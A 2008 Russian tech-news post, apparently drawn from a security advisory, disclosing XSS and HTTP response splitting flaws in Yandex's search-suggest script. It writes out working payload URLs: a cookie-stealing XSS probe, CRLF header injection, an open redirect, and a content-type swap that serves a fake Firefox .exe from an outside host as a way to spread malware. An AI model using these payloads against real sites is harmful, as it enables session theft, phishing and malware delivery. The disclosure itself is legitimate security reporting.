HighTech Reporter
новости и обзоры хай-тека

В сервисе поисковых подсказок Яндекса обнаружены множественные уязвимости

* Тип уязвимости: Межсайтовое выполнение сценариев (Cross-site Scripting, XSS). Недостаточная фильтрация содержимого переменной.

Приложение: /suggest-ya.cgi

GET-переменные: part

Пример: http://suggest.yandex.ru/suggest-ya.cgi?ct=text/html&part=alert(document.cookie)

* Тип уязвимости: Расщепление HTTP-запроса (HTTP Response Splitting)

Приложение: /suggest-ya.cgi

GET-переменные: ct

Пример: ttp://suggest.yandex.ru/suggest-ya.cgi?ct=text/html%0d%0aSet-cookie:Fuzzing=fuzzing.ru%0d%0a%0d%0a&part=fuzzing.ru (устанавливает cookie от имени сервера)


Простые примеры применения, не говоря уже о сложных вариантах.


* Универсальный редиректор - http://suggest.yandex.ru/suggest-ya.cgi?ct=text/html%0d%0aLocation:%20http://fuzzing.ru/%0d%0a%0d%0a&part=fuzzing.ru


* Использование уязвимостей других приложений или распостранение вирусов (подмена content-type)

Можно предложить, к примеру, скачать с Яндекса великолепную программу Firefox с поиском Яндекса

http://suggest.yandex.ru/suggest-ya.cgi?ct=application/x-msdos-program%0d%0aLocation:%20http://fuzzing.ru/blog/files/FirefoxSetup.exe%0d%0a%0d%0a&part=fuzzing.ru

Или любое другое приложение или мультимедиа-файл. К примеру.

http://suggest.yandex.ru/suggest-ya.cgi?ct=audio/mp3%0d%0aLocation:%20http://fuzzing.ru/blog/files/somedata.mp3%0d%0a%0d%0a&part=fuzzing.ru


* Подмена содержимого страницы - http://suggest.yandex.ru/suggest-ya.cgi?ct=text/html;charset=utf-8%0d%0a%0d%0a%D0%91%D0%BB%D0%BE%D0%B3%20fuzzing.ru//&part=fuzzing.ru

www.securitylab.ru

Последняя модификация: 17 Октябрь, 2008

публикация была размещена Пятница, 17 октября, 2008 в 00:41 и помещена в Безопасность. Вы можете отслеживать комментарии на эту публикацию на RSS 2.0 ленте. Комментирование и пинги запрещены.

Еще стоит прочитать о:

Комментирование закрыто.